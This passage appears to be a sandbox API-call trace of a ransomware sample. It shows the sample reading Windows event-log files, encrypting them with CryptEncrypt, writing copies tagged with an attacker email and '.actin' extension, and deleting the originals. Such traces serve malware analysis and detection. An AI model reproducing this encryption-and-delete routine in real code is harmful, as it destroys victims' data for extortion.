lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0066.184] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71d40) returned 1 [0066.184] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.184] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x80, dwBufLen=0x80 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x80) returned 1 [0066.184] CryptDestroyKey (hKey=0xf71d40) returned 1 [0066.184] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x132, lpOverlapped=0x0) returned 1 [0066.184] CryptDestroyKey (hKey=0xf71f40) returned 1 [0066.184] CloseHandle (hObject=0x320) returned 1 [0066.184] CloseHandle (hObject=0x268) returned 1 [0066.186] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx")) returned 1 [0066.187] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0066.187] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0066.187] GetFileSizeEx (in: hFile=0x268, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0066.187] CloseHandle (hObject=0x268) returned 1 [0066.187] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx")) returned 0x20 [0066.188] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.188] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0066.188] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.188] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.188] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0066.188] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71ec0) returned 1 [0066.188] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.188] ReadFile (in: hFile=0x268, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0066.190] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0066.191] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0066.192] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf72180) returned 1 [0066.192] CryptSetKeyParam (hKey=0xf72180, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.192] CryptEncrypt (in: hKey=0xf72180, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x80, dwBufLen=0x80 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x80) returned 1 [0066.192] CryptDestroyKey (hKey=0xf72180) returned 1 [0066.192] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x132, lpOverlapped=0x0) returned 1 [0066.193] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0066.193] CloseHandle (hObject=0x268) returned 1 [0066.193] CloseHandle (hObject=0x320) returned 1 [0066.194] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx")) returned 1 [0066.196] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0066.196] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0066.197] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0066.197] CloseHandle (hObject=0x320) returned 1 [0066.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx")) returned 0x20 [0066.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.197] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0066.197] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.197] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.197] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0066.198] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72100) returned 1 [0066.198] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.198] ReadFile (in: hFile=0x320, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0066.200] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0066.200] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0066.202] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf72040) returned 1 [0066.202] CryptSetKeyParam (hKey=0xf72040, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.202] CryptEncrypt (in: hKey=0xf72040, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xa0, dwBufLen=0xa0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xa0) returned 1 [0066.202] CryptDestroyKey (hKey=0xf72040) returned 1 [0066.202] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x152, lpOverlapped=0x0) returned 1 [0066.202] CryptDestroyKey (hKey=0xf72100) returned 1 [0066.202] CloseHandle (hObject=0x320) returned 1 [0066.202] CloseHandle (hObject=0x268) returned 1 [0066.204] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx")) returned 1 [0066.205] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0066.205] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0066.206] GetFileSizeEx (in: hFile=0x268, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0066.206] CloseHandle (hObject=0x268) returned 1 [0066.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx")) returned 0x20 [0066.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.206] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0066.206] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.206] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.206] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0066.206] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71dc0) returned 1 [0066.206] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.206] ReadFile (in: hFile=0x268, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0066.385] CryptEncrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0066.386] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0066.389] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71cc0) returned 1 [0066.389] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.389] CryptEncrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x80, dwBufLen=0x80 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x80) returned 1 [0066.389] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0066.389] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x132, lpOverlapped=0x0) returned 1 [0066.389] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0066.389] CloseHandle (hObject=0x268) returned 1 [0066.390] CloseHandle (hObject=0x320) returned 1 [0066.391] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx")) returned 1 [0066.510] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0066.510] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0066.510] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0066.510] CloseHandle (hObject=0x300) returned 1 [0066.511] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx")) returned 0x20 [0066.511] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.511] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0066.511] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.511] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.511] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0066.511] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71b00) returned 1 [0066.511] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.511] ReadFile (in: hFile=0x300, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0066.513] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0066.513] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0066.515] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71e00) returned 1 [0066.515] CryptSetKeyParam (hKey=0xf71e00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.516] CryptEncrypt (in: hKey=0xf71e00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xa0, dwBufLen=0xa0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xa0) returned 1 [0066.516] CryptDestroyKey (hKey=0xf71e00) returned 1 [0066.516] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x152, lpOverlapped=0x0) returned 1 [0066.516] CryptDestroyKey (hKey=0xf71b00) returned 1 [0066.516] CloseHandle (hObject=0x300) returned 1 [0066.516] CloseHandle (hObject=0x268) returned 1 [0066.518] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx")) returned 1 [0066.519] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0066.519] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0066.520] GetFileSizeEx (in: hFile=0x268, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0066.520] CloseHandle (hObject=0x268) returned 1 [0066.520] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx")) returned 0x20 [0066.520] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.520] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0066.520] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.520] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.520] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0066.520] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71b00) returned 1 [0066.520] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.520] ReadFile (in: hFile=0x268, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0066.522] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0066.523] WriteFile (in: hFile=0x300, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0066.524] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71dc0) returned 1 [0066.525] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.525] CryptEncrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x80, dwBufLen=0x80 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x80) returned 1 [0066.525] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0066.525] WriteFile (in: hFile=0x300, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x132, lpOverlapped=0x0) returned 1 [0066.525] CryptDestroyKey (hKey=0xf71b00) returned 1 [0066.525] CloseHandle (hObject=0x268) returned 1 [0066.525] CloseHandle (hObject=0x300) returned 1 [0066.527] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx")) returned 1 [0066.528] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0066.528] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0066.529] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=1052672) returned 1 [0066.529] CloseHandle (hObject=0x300) returned 1 [0066.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx")) returned 0x20 [0066.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.529] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0066.529] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.529] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.529] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0066.531] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71a00) returned 